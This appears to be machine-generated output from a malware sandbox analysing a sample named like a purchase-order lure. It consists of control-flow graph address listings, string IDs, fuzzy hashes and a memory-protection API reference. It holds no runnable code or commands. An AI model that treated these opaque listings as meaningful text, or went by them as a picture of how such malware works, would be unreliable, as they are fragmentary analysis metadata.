                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 643 65a4c78-65a4c99 644 65a4c9b 643->644 645 65a4ca0-65a4d87 643->645 644->645 647 65a5489-65a54b1 645->647 648 65a4d8d-65a4ece 645->648 651 65a5bb7-65a5bc0 647->651 692 65a5452-65a547c 648->692 693 65a4ed4-65a4f2f 648->693 653 65a54bf-65a54c9 651->653 654 65a5bc6-65a5bdd 651->654 655 65a54cb 653->655 656 65a54d0-65a55c4 653->656 655->656 675 65a55ee 656->675 676 65a55c6-65a55d2 656->676 679 65a55f4-65a5614 675->679 677 65a55dc-65a55e2 676->677 678 65a55d4-65a55da 676->678 680 65a55ec 677->680 678->680 683 65a5616-65a566f 679->683 684 65a5674-65a56f4 679->684 680->679 698 65a5bb4 683->698 706 65a574b-65a578e 684->706 707 65a56f6-65a5749 684->707 703 65a547e 692->703 704 65a5486 692->704 700 65a4f31 693->700 701 65a4f34-65a4f3f 693->701 698->651 700->701 705 65a5367-65a536d 701->705 703->704 704->647 708 65a5373-65a53ef 705->708 709 65a4f44-65a4f62 705->709 729 65a5799-65a57a2 706->729 707->729 750 65a543c-65a5442 708->750 711 65a4fb9-65a4fce 709->711 712 65a4f64-65a4f68 709->712 714 65a4fd0 711->714 715 65a4fd5-65a4feb 711->715 712->711 716 65a4f6a-65a4f75 712->716 714->715 719 65a4fed 715->719 720 65a4ff2-65a5009 715->720 721 65a4fab-65a4fb1 716->721 719->720 726 65a500b 720->726 727 65a5010-65a5026 720->727 724 65a4fb3-65a4fb4 721->724 725 65a4f77-65a4f7b 721->725 728 65a5037-65a50a2 724->728 730 65a4f7d 725->730 731 65a4f81-65a4f99 725->731 726->727 732 65a5028 727->732 733 65a502d-65a5034 727->733 735 65a50b6-65a526b 728->735 736 65a50a4-65a50b0 728->736 738 65a5802-65a5811 729->738 730->731 739 65a4f9b 731->739 740 65a4fa0-65a4fa8 731->740 732->733 733->728 748 65a52cf-65a52e4 735->748 749 65a526d-65a5271 735->749 736->735 741 65a5813-65a589b 738->741 742 65a57a4-65a57cc 738->742 739->740 740->721 777 65a5a14-65a5a20 741->777 745 65a57ce 742->745 746 65a57d3-65a57fc 742->746 745->746 746->738 755 65a52eb-65a530c 748->755 756 65a52e6 748->756 749->748 751 65a5273-65a5282 749->751 753 65a53f1-65a5439 750->753 754 65a5444-65a544a 750->754 760 65a52c1-65a52c7 751->760 753->750 754->692 757 65a530e 755->757 758 65a5313-65a5332 755->758 756->755 757->758 761 65a5339-65a5359 758->761 762 65a5334 758->762 764 65a52c9-65a52ca 760->764 765 65a5284-65a5288 760->765 770 65a535b 761->770 771 65a5360 761->771 762->761 772 65a5364 764->772 768 65a528a-65a528e 765->768 769 65a5292-65a52b3 765->769 768->769 773 65a52ba-65a52be 769->773 774 65a52b5 769->774 770->771 771->772 772->705 773->760 774->773 779 65a58a0-65a58a9 777->779 780 65a5a26-65a5a81 777->780 781 65a58ab 779->781 782 65a58b2-65a5a08 779->782 795 65a5ab8-65a5ae2 780->795 796 65a5a83-65a5ab6 780->796 781->782 784 65a58b8-65a58f8 781->784 785 65a58fd-65a593d 781->785 786 65a5942-65a5982 781->786 787 65a5987-65a59c7 781->787 797 65a5a0e 782->797 784->797 785->797 786->797 787->797 804 65a5aeb-65a5b7e 795->804 796->804 797->777 808 65a5b85-65a5ba5 804->808 808->698
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164245963.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJbq$Te]q$paq$xb`q
                                                          • API String ID: 0-4160082283
                                                          • Opcode ID: 1c252bc7684b25b8d14e16196d7f95a16745c85751f27d81bdd1bed58fd6737f
                                                          • Instruction ID: d58baf9ae3bfac763bc00ec8e1b50c96c8cff7c4b943dfcac956e18132e6b932
                                                          • Opcode Fuzzy Hash: 1c252bc7684b25b8d14e16196d7f95a16745c85751f27d81bdd1bed58fd6737f
                                                          • Instruction Fuzzy Hash: C2A2B375A00228CFDB65CF69C984A9DBBB2FF89304F1581E9D509AB325DB319E81CF50
                                                          Function 065A7038 Relevance: 5.1, Strings: 3, Instructions: 1351COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 810 65a7038-65a703c 811 65a6fc8-65a6fd4 810->811 812 65a703e-65a7076 810->812 811->810 813 65a7078 812->813 814 65a707d-65a719f 812->814 813->814 818 65a71c3-65a71cf 814->818 819 65a71a1-65a71ad 814->819 820 65a71d1 818->820 821 65a71d6-65a71db 818->821 822 65a71b7 819->822 820->821 823 65a71dd-65a71e9 821->823 824 65a7213-65a725c 821->824 1096 65a71bd call 65a9bd8 822->1096 1097 65a71bd call 65a9bc9 822->1097 825 65a71eb 823->825 826 65a71f0-65a720e 823->826 832 65a725e 824->832 833 65a7263-65a7296 824->833 825->826 827 65a8977-65a897d 826->827 829 65a89a8 827->829 830 65a897f-65a899f 827->830 830->829 832->833 837 65a72a0-65a72a6 833->837 838 65a72b2-65a7528 837->838 859 65a7f58-65a7f64 838->859 860 65a7f6a-65a7fa2 859->860 861 65a752d-65a7539 859->861 870 65a807c-65a8082 860->870 862 65a753b 861->862 863 65a7540-65a7665 861->863 862->863 898 65a7667-65a769f 863->898 899 65a76a5-65a772e 863->899 871 65a8088-65a80c0 870->871 872 65a7fa7-65a8024 870->872 882 65a841e-65a8424 871->882 887 65a8026-65a802a 872->887 888 65a8057-65a8079 872->888 884 65a842a-65a8472 882->884 885 65a80c5-65a82c7 882->885 893 65a84ed-65a8538 884->893 894 65a8474-65a84e7 884->894 979 65a82cd-65a8361 885->979 980 65a8366-65a836a 885->980 887->888 892 65a802c-65a8054 887->892 888->870 892->888 917 65a8941-65a8947 893->917 894->893 898->899 926 65a773d-65a77c1 899->926 927 65a7730-65a7738 899->927 919 65a853d-65a85bf 917->919 920 65a894d-65a8975 917->920 938 65a85c1-65a85dc 919->938 939 65a85e7-65a85f3 919->939 920->827 954 65a77c3-65a77cb 926->954 955 65a77d0-65a7854 926->955 928 65a7f49-65a7f55 927->928 928->859 938->939 941 65a85fa-65a8606 939->941 942 65a85f5 939->942 946 65a8608-65a8614 941->946 947 65a8619-65a8628 941->947 942->941 949 65a8928-65a893e 946->949 950 65a862a 947->950 951 65a8631-65a8909 947->951 949->917 950->951 956 65a87fe-65a8866 950->956 957 65a8722-65a878b 950->957 958 65a8790-65a87f9 950->958 959 65a8637-65a86a0 950->959 960 65a86a5-65a871d 950->960 983 65a8914-65a8920 951->983 954->928 1002 65a7863-65a78e7 955->1002 1003 65a7856-65a785e 955->1003 990 65a88da-65a88e0 956->990 957->983 958->983 959->983 960->983 1004 65a8405-65a841b 979->1004 985 65a836c-65a83c5 980->985 986 65a83c7-65a8404 980->986 983->949 985->1004 986->1004 995 65a8868-65a88c6 990->995 996 65a88e2-65a88ec 990->996 1007 65a88c8 995->1007 1008 65a88cd-65a88d7 995->1008 996->983 1017 65a78e9-65a78f1 1002->1017 1018 65a78f6-65a797a 1002->1018 1003->928 1004->882 1007->1008 1008->990 1017->928 1024 65a7989-65a7a0d 1018->1024 1025 65a797c-65a7984 1018->1025 1031 65a7a0f-65a7a17 1024->1031 1032 65a7a1c-65a7aa0 1024->1032 1025->928 1031->928 1038 65a7aaf-65a7b33 1032->1038 1039 65a7aa2-65a7aaa 1032->1039 1045 65a7b42-65a7bc6 1038->1045 1046 65a7b35-65a7b3d 1038->1046 1039->928 1052 65a7bc8-65a7bd0 1045->1052 1053 65a7bd5-65a7c59 1045->1053 1046->928 1052->928 1059 65a7c5b-65a7c63 1053->1059 1060 65a7c68-65a7cec 1053->1060 1059->928 1066 65a7cfb-65a7d7f 1060->1066 1067 65a7cee-65a7cf6 1060->1067 1073 65a7d8e-65a7e12 1066->1073 1074 65a7d81-65a7d89 1066->1074 1067->928 1080 65a7e21-65a7ea5 1073->1080 1081 65a7e14-65a7e1c 1073->1081 1074->928 1087 65a7ea7-65a7eaf 1080->1087 1088 65a7eb4-65a7f38 1080->1088 1081->928 1087->928 1094 65a7f3a-65a7f42 1088->1094 1095 65a7f44-65a7f46 1088->1095 1094->928 1095->928 1096->818 1097->818
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164245963.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M$2$$]q
                                                          • API String ID: 0-2743037065
                                                          • Opcode ID: 8c78c4520dd621f107bd8f505d1f3d494616afd13fd3fc955e84297801860ef4
                                                          • Instruction ID: c9f828bd27e7c2e61b9b9bf83c46e8127658756650c3ac1dfa232c8c1b463048
                                                          • Opcode Fuzzy Hash: 8c78c4520dd621f107bd8f505d1f3d494616afd13fd3fc955e84297801860ef4
                                                          • Instruction Fuzzy Hash: 88E2C374A052298FCB64DF68D994BDDBBB2FB89301F1091EAE409A7355DB309E81CF50
                                                          Function 05AFE6A0 Relevance: 4.4, Strings: 3, Instructions: 615COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1152 5afe6a0-5afe6c1 1153 5afe6c8-5afe758 call 5aff1f0 1152->1153 1154 5afe6c3 1152->1154 1159 5afe75e-5afe79b 1153->1159 1154->1153 1161 5afe79d-5afe7a8 1159->1161 1162 5afe7aa 1159->1162 1163 5afe7b4-5afe8cf 1161->1163 1162->1163 1174 5afe8e1-5afe90c 1163->1174 1175 5afe8d1-5afe8d7 1163->1175 1176 5aff0d4-5aff0f0 1174->1176 1175->1174 1177 5aff0f6-5aff111 1176->1177 1178 5afe911-5afea74 call 5afd1b8 1176->1178 1189 5afea86-5afec17 call 5afa6f8 call 5af71d8 1178->1189 1190 5afea76-5afea7c 1178->1190 1202 5afec7c-5afec86 1189->1202 1203 5afec19-5afec1d 1189->1203 1190->1189 1206 5afeead-5afeecc 1202->1206 1204 5afec1f-5afec20 1203->1204 1205 5afec25-5afec77 1203->1205 1207 5afef52-5afefbd 1204->1207 1205->1207 1208 5afec8b-5afedd1 call 5afd1b8 1206->1208 1209 5afeed2-5afeefc 1206->1209 1226 5afefcf-5aff01a 1207->1226 1227 5afefbf-5afefc5 1207->1227 1238 5afedd7-5afeea3 call 5afd1b8 1208->1238 1239 5afeea6-5afeea7 1208->1239 1215 5afef4f-5afef50 1209->1215 1216 5afeefe-5afef4c 1209->1216 1215->1207 1216->1215 1229 5aff0b9-5aff0d1 1226->1229 1230 5aff020-5aff0b8 1226->1230 1227->1226 1229->1176 1230->1229 1238->1239 1239->1206
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2162304348.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5af0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fbq$0M$8
                                                          • API String ID: 0-1949280450
                                                          • Opcode ID: 970cb72c394ac9f4913060eae983ea67d3b45f6def7a5fdab9682b9a13491d92
                                                          • Instruction ID: f5c973ba6053d8f67ce2a29bcd9668aaff9db8994b3d998e924b6896469b6623
                                                          • Opcode Fuzzy Hash: 970cb72c394ac9f4913060eae983ea67d3b45f6def7a5fdab9682b9a13491d92
                                                          • Instruction Fuzzy Hash: 1152D575E002298FDB64DF69C990BD9B7B2FB89310F5085AAD90DA7354DB30AE81CF50
                                                          Function 05AFE685 Relevance: 3.9, Strings: 3, Instructions: 177COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2028 5afe685-5afe6c1 2030 5afe6c8-5afe758 call 5aff1f0 2028->2030 2031 5afe6c3 2028->2031 2036 5afe75e-5afe79b 2030->2036 2031->2030 2038 5afe79d-5afe7a8 2036->2038 2039 5afe7aa 2036->2039 2040 5afe7b4-5afe8cf 2038->2040 2039->2040 2051 5afe8e1-5afe90c 2040->2051 2052 5afe8d1-5afe8d7 2040->2052 2053 5aff0d4-5aff0f0 2051->2053 2052->2051 2054 5aff0f6-5aff111 2053->2054 2055 5afe911-5afea74 call 5afd1b8 2053->2055 2066 5afea86-5afec17 call 5afa6f8 call 5af71d8 2055->2066 2067 5afea76-5afea7c 2055->2067 2079 5afec7c-5afec86 2066->2079 2080 5afec19-5afec1d 2066->2080 2067->2066 2083 5afeead-5afeecc 2079->2083 2081 5afec1f-5afec20 2080->2081 2082 5afec25-5afec77 2080->2082 2084 5afef52-5afefbd 2081->2084 2082->2084 2085 5afec8b-5afedd1 call 5afd1b8 2083->2085 2086 5afeed2-5afeefc 2083->2086 2103 5afefcf-5aff01a 2084->2103 2104 5afefbf-5afefc5 2084->2104 2115 5afedd7-5afeea3 call 5afd1b8 2085->2115 2116 5afeea6-5afeea7 2085->2116 2092 5afef4f-5afef50 2086->2092 2093 5afeefe-5afef4c 2086->2093 2092->2084 2093->2092 2106 5aff0b9-5aff0d1 2103->2106 2107 5aff020-5aff0b8 2103->2107 2104->2103 2106->2053 2107->2106 2115->2116 2116->2083
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2162304348.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5af0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fbq$0M$h
                                                          • API String ID: 0-524613942
                                                          • Opcode ID: 860c0c42caa3bca2da3b98dc69ef0a65f0dfb37c73bddef705af8ad1c7639b2a
                                                          • Instruction ID: c94240d7b2a475297677aa59f0e6f560cbefd0f3ffd5c370cabe1c01905b6147
                                                          • Opcode Fuzzy Hash: 860c0c42caa3bca2da3b98dc69ef0a65f0dfb37c73bddef705af8ad1c7639b2a
                                                          • Instruction Fuzzy Hash: CF811671D052698FDB64DF69CC50BC9BBB2FF89300F0081EAE909A7255DB306A85CF60
                                                          Function 06607490 Relevance: 3.1, Strings: 2, Instructions: 559COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2346 6607490-66074aa 2347 66074b6-66074c2 2346->2347 2348 66074ac-66074b3 2346->2348 2350 66074c4-66074d1 2347->2350 2351 660751e-6607521 2347->2351 2358 66074d7-6607507 2350->2358 2359 66076ef-6607727 2350->2359 2352 6607523-6607525 2351->2352 2353 6607534-6607537 2351->2353 2357 660752d 2352->2357 2355 6607539-6607557 2353->2355 2356 660755d-6607560 2353->2356 2355->2356 2365 660772e-6607779 2355->2365 2360 66076e5-66076ec 2356->2360 2361 6607566-660756c 2356->2361 2357->2353 2390 6607514-6607517 2358->2390 2391 6607509-6607512 2358->2391 2359->2365 2361->2360 2363 6607572-660757b 2361->2363 2371 66075b3-66075b9 2363->2371 2372 660757d-660758c 2363->2372 2393 66077b2-66077b4 2365->2393 2394 660777b-6607788 2365->2394 2373 66076c4-66076ca 2371->2373 2374 66075bf-66075c8 2371->2374 2372->2371 2380 660758e-66075a7 2372->2380 2373->2360 2376 66076cc-66076dc 2373->2376 2374->2373 2385 66075ce-66075da 2374->2385 2376->2360 2388 66076de-66076e3 2376->2388 2380->2371 2392 66075a9-66075ac 2380->2392 2397 66075e0-6607608 2385->2397 2398 6607678-66076bc 2385->2398 2388->2360 2390->2351 2391->2351 2392->2371 2396 6607bff-6607c06 2393->2396 2394->2393 2401 660778a-66077b0 2394->2401 2397->2398 2409 660760a-6607647 2397->2409 2398->2373 2401->2393 2412 66077b9-66077ed 2401->2412 2409->2398 2423 6607649-6607676 2409->2423 2421 6607890-660789f 2412->2421 2422 66077f3-66077fc 2412->2422 2430 66078a1-66078b7 2421->2430 2431 66078de 2421->2431 2424 6607802-6607815 2422->2424 2425 6607c07-6607c11 2422->2425 2423->2373 2433 6607817-6607830 2424->2433 2434 660787e-660788a 2424->2434 2436 6607c73-6607cbb 2425->2436 2437 6607c13 2425->2437 2444 66078d7-66078dc 2430->2444 2445 66078b9-66078d5 2430->2445 2432 66078e0-66078e5 2431->2432 2438 66078e7-6607908 2432->2438 2439 6607928-6607944 2432->2439 2433->2434 2454 6607832-6607840 2433->2454 2434->2421 2434->2422 2437->2436 2438->2439 2458 660790a 2438->2458 2450 660794a-6607953 2439->2450 2451 6607a0c-6607a15 2439->2451 2444->2432 2445->2432 2450->2425 2457 6607959-6607976 2450->2457 2455 6607a1b 2451->2455 2456 6607bfd 2451->2456 2454->2434 2469 6607842-6607846 2454->2469 2459 6607a22-6607a24 2455->2459 2460 6607a86-6607a94 call 6604b50 2455->2460 2461 6607a29-6607a37 call 6604b50 2455->2461 2456->2396 2478 66079fa-6607a06 2457->2478 2479 660797c-6607992 2457->2479 2464 660790d-6607926 2458->2464 2459->2396 2473 6607a96-6607a9e 2460->2473 2474 6607aac-6607ac3 call 6604b50 2460->2474 2470 6607a39-6607a41 2461->2470 2471 6607a4f-6607a56 2461->2471 2464->2439 2469->2425 2476 660784c-6607865 2469->2476 2470->2471 2471->2396 2473->2474 2487 6607ac5-6607acd 2474->2487 2488 6607adb-6607aee call 6604b50 2474->2488 2476->2434 2493 6607867-660787b call 6603980 2476->2493 2478->2450 2478->2451 2479->2478 2496 6607994-66079a2 2479->2496 2487->2488 2498 6607af0-6607af8 2488->2498 2499 6607b06-6607b23 call 6604b50 2488->2499 2493->2434 2496->2478 2504 66079a4-66079a8 2496->2504 2498->2499 2510 6607b25-6607b2d 2499->2510 2511 6607b3b 2499->2511 2504->2425 2506 66079ae-66079d7 2504->2506 2506->2478 2515 66079d9-66079f7 call 6603980 2506->2515 2510->2511 2511->2396 2515->2478
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164707308.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6600000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Pl]q$$]q
                                                          • API String ID: 0-2369359564
                                                          • Opcode ID: ff295fb512e0db7c6ede97ebf191f2d22c8c8d8a35740270a0dd5a09961057f6
                                                          • Instruction ID: 268c818d3dc8290a1468f534e4850432b17c3605651affa47d319b5e8a2b59bb
                                                          • Opcode Fuzzy Hash: ff295fb512e0db7c6ede97ebf191f2d22c8c8d8a35740270a0dd5a09961057f6
                                                          • Instruction Fuzzy Hash: 84223934B001058FEB58DF29C984A6ABBF6FF88715B1584A9E506CB3B1DB31EC41CB60
                                                          Function 065AF628 Relevance: 2.9, Strings: 2, Instructions: 435COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2520 65af628-65af653 2521 65af65a-65af6b0 2520->2521 2522 65af655 2520->2522 2525 65af6b9-65af6ec 2521->2525 2526 65af6b2 2521->2526 2522->2521 2530 65af6ee-65af6f4 2525->2530 2526->2525 2531 65af6fd-65af6fe 2530->2531 2532 65af6f6 2530->2532 2534 65af752-65af7ec 2531->2534 2532->2531 2533 65af98f-65af9d1 2532->2533 2532->2534 2535 65af8d3-65af97e 2532->2535 2536 65af700-65af746 2532->2536 2537 65af7f1-65af8c0 2532->2537 2538 65afaa7-65afac9 2532->2538 2539 65afad5-65afb2b 2532->2539 2575 65af9db-65af9e0 2533->2575 2576 65af9d3-65af9d9 2533->2576 2534->2530 2535->2530 2612 65af984-65af98a 2535->2612 2536->2530 2570 65af748-65af750 2536->2570 2537->2530 2618 65af8c6-65af8ce 2537->2618 2540 65afacb-65afad3 2538->2540 2541 65afa95-65afa9b 2538->2541 2539->2541 2572 65afb31-65afb37 2539->2572 2540->2541 2545 65afa9d 2541->2545 2546 65afaa4-65afaa5 2541->2546 2545->2538 2545->2539 2545->2546 2550 65afb3c-65afb59 2545->2550 2551 65afddd-65afe26 2545->2551 2552 65afe33-65afe34 2545->2552 2553 65afb96-65afbd9 2545->2553 2554 65afd6a 2545->2554 2555 65afc4e-65afc97 2545->2555 2556 65afd0f-65afd5b 2545->2556 2557 65afd0c-65afd0d 2545->2557 2558 65afbe3 2545->2558 2559 65afca4-65afca5 2545->2559 2546->2538 2568 65afbe4 2550->2568 2574 65afb5f-65afb78 2550->2574 2588 65afdc8-65afdd1 2551->2588 2600 65afe28-65afe31 2551->2600 2585 65afb84-65afb8a 2553->2585 2606 65afbdb-65afbe1 2553->2606 2564 65afd6b 2554->2564 2579 65afc39-65afc42 2555->2579 2601 65afc99-65afca2 2555->2601 2571 65afcf7-65afd00 2556->2571 2604 65afd5d-65afd68 2556->2604 2557->2564 2558->2568 2559->2571 2564->2588 2568->2579 2570->2530 2581 65afd09-65afd0a 2571->2581 2582 65afd02 2571->2582 2572->2541 2584 65afb7a-65afb82 2574->2584 2574->2585 2586 65af9e2-65af9e3 2575->2586 2587 65af9e5-65afa33 2575->2587 2576->2575 2591 65afc4b-65afc4c 2579->2591 2592 65afc44 2579->2592 2581->2557 2582->2551 2582->2552 2582->2554 2582->2556 2582->2557 2582->2581 2584->2585 2595 65afb8c 2585->2595 2596 65afb93-65afb94 2585->2596 2586->2587 2613 65afa3d-65afa42 2587->2613 2614 65afa35-65afa3b 2587->2614 2597 65afdda-65afddb 2588->2597 2598 65afdd3 2588->2598 2591->2559 2592->2551 2592->2552 2592->2554 2592->2555 2592->2556 2592->2557 2592->2559 2592->2591 2595->2551 2595->2552 2595->2553 2595->2554 2595->2555 2595->2556 2595->2557 2595->2558 2595->2559 2595->2596 2596->2558 2597->2552 2598->2551 2598->2552 2598->2597 2600->2588 2601->2579 2604->2571 2606->2585 2612->2530 2616 65afa47-65afa64 2613->2616 2617 65afa44-65afa45 2613->2617 2614->2613 2622 65afa6a call 6600290 2616->2622 2623 65afa6a call 66002e8 2616->2623 2624 65afa6a call 6600239 2616->2624 2625 65afa6a call 66002d9 2616->2625 2617->2616 2618->2530 2620 65afa70-65afa89 2620->2541 2621 65afa8b-65afa93 2620->2621 2621->2541 2622->2620 2623->2620 2624->2620 2625->2620
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164245963.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M$Te]q
                                                          • API String ID: 0-2551741560
                                                          • Opcode ID: 368d88ada373300b7f30dfe8776e11b4dd71fe3b408db03750b5a00bfe488b68
                                                          • Instruction ID: d7a4d88b6da99423263bf4cb955aa5779875a2f33597af4f2d8ee3e1802168d6
                                                          • Opcode Fuzzy Hash: 368d88ada373300b7f30dfe8776e11b4dd71fe3b408db03750b5a00bfe488b68
                                                          • Instruction Fuzzy Hash: E1120F70A05219CFEBA4DF69D894BEDB7F2FB89300F1091AAD809A7355DB305A85CF50
                                                          Function 067D97F0 Relevance: 2.8, Strings: 2, Instructions: 322COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M$PH]q
                                                          • API String ID: 0-669990556
                                                          • Opcode ID: f59812646ebd0f1fe80c87efdf7e1b111fdaa4b57d7d517906803cc117724a48
                                                          • Instruction ID: 6e6f44177c6c474b81a77f48940623138ab5b48195d56863a5b3ee78a31cd71d
                                                          • Opcode Fuzzy Hash: f59812646ebd0f1fe80c87efdf7e1b111fdaa4b57d7d517906803cc117724a48
                                                          • Instruction Fuzzy Hash: 51E12570E05218CFEB94DFA9C984BADBBF2FB89304F1095A9D609A7355DB704A85CF40
                                                          Function 067D97DF Relevance: 2.8, Strings: 2, Instructions: 319COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M$PH]q
                                                          • API String ID: 0-669990556
                                                          • Opcode ID: 3347cfc109b5856e1466cdc28a8c9db7f37d14bc5e00619c1f5066de2d28a701
                                                          • Instruction ID: e31ecb4e003dc20d2d902941726839c06f37245b5bde55b06477b2a82c411e00
                                                          • Opcode Fuzzy Hash: 3347cfc109b5856e1466cdc28a8c9db7f37d14bc5e00619c1f5066de2d28a701
                                                          • Instruction Fuzzy Hash: AFE11370E05218CFEB94DFA9C984BADBBF2FB89304F1094AAD509A7355DB305A85CF50
                                                          Function 067D3E58 Relevance: 1.9, Strings: 1, Instructions: 609COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169967213.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67d0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq
                                                          • API String ID: 0-600464949
                                                          • Opcode ID: 17e5b0c8d526d8a97b1dac640632df883988aa40ea08dbc139c3a2168f34facb
                                                          • Instruction ID: ee7a3558fa2c60ac72c5b8997a331c5ea3303469918adc183a26439cc6b84448
                                                          • Opcode Fuzzy Hash: 17e5b0c8d526d8a97b1dac640632df883988aa40ea08dbc139c3a2168f34facb
                                                          • Instruction Fuzzy Hash: DF325870B006168FCB98DFA9C494A7EFBF2FB88300F148929D55AD7385DB30A945CB91
                                                          Function 065A89AB Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2164245963.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65a0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0M
                                                          • API String ID: 0-2051941792
                                                          • Opcode ID: ad5823df4395efce95bd92c968779eaaa7b9afe67ca4605bb2a7a776d2d68c04
                                                          • Instruction ID: b4fd0749dcc610be3066f956b2c3bfa787372685e6bfeb38e7ca423b9076545b
                                                          • Opcode Fuzzy Hash: ad5823df4395efce95bd92c968779eaaa7b9afe67ca4605bb2a7a776d2d68c04
                                                          • Instruction Fuzzy Hash: 0752C5B4A052298FCBA4DF28C984B9EB7B6FB49301F1081D9D90DA7355DB309E85CF61
                                                          Function 067C1C81 Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 067C1D11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 908707e796103f452b19475eb6fe5d527a2053e58f98f8750288df5e13d8ba1d
                                                          • Instruction ID: 877447093e88ba025a3582a4582ad67f46bc2b1655402170781bf75d10ebed2d
                                                          • Opcode Fuzzy Hash: 908707e796103f452b19475eb6fe5d527a2053e58f98f8750288df5e13d8ba1d
                                                          • Instruction Fuzzy Hash: 7D21F3B1D002099FCB10DFAAD984AEEFBF5FF48310F60842AE519A3210C775A944CBA1
                                                          Function 067C1C88 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 067C1D11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2169905796.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_67c0000_PO-12202432_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 50a42205f74bb2ef9edd8b2ab6ce219c4445ad1847fcb46abfbeba6ee1064b5e
                                                          • Instruction ID: d671ae715fd3f8298af633408582a0c85d00eef28b94a486d88b2e6b806a095f
                                                          • Opcode Fuzzy Hash: 50a42205f74bb2ef9edd8b2ab6ce219c4445ad1847fcb46abfbeba6ee1064b5e
                                                          • Instruction Fuzzy Hash: 3A21D4B1D012499FCB10DFAAD984AEEFBF5FF48310F60842AE519A7250C7759940CBA1
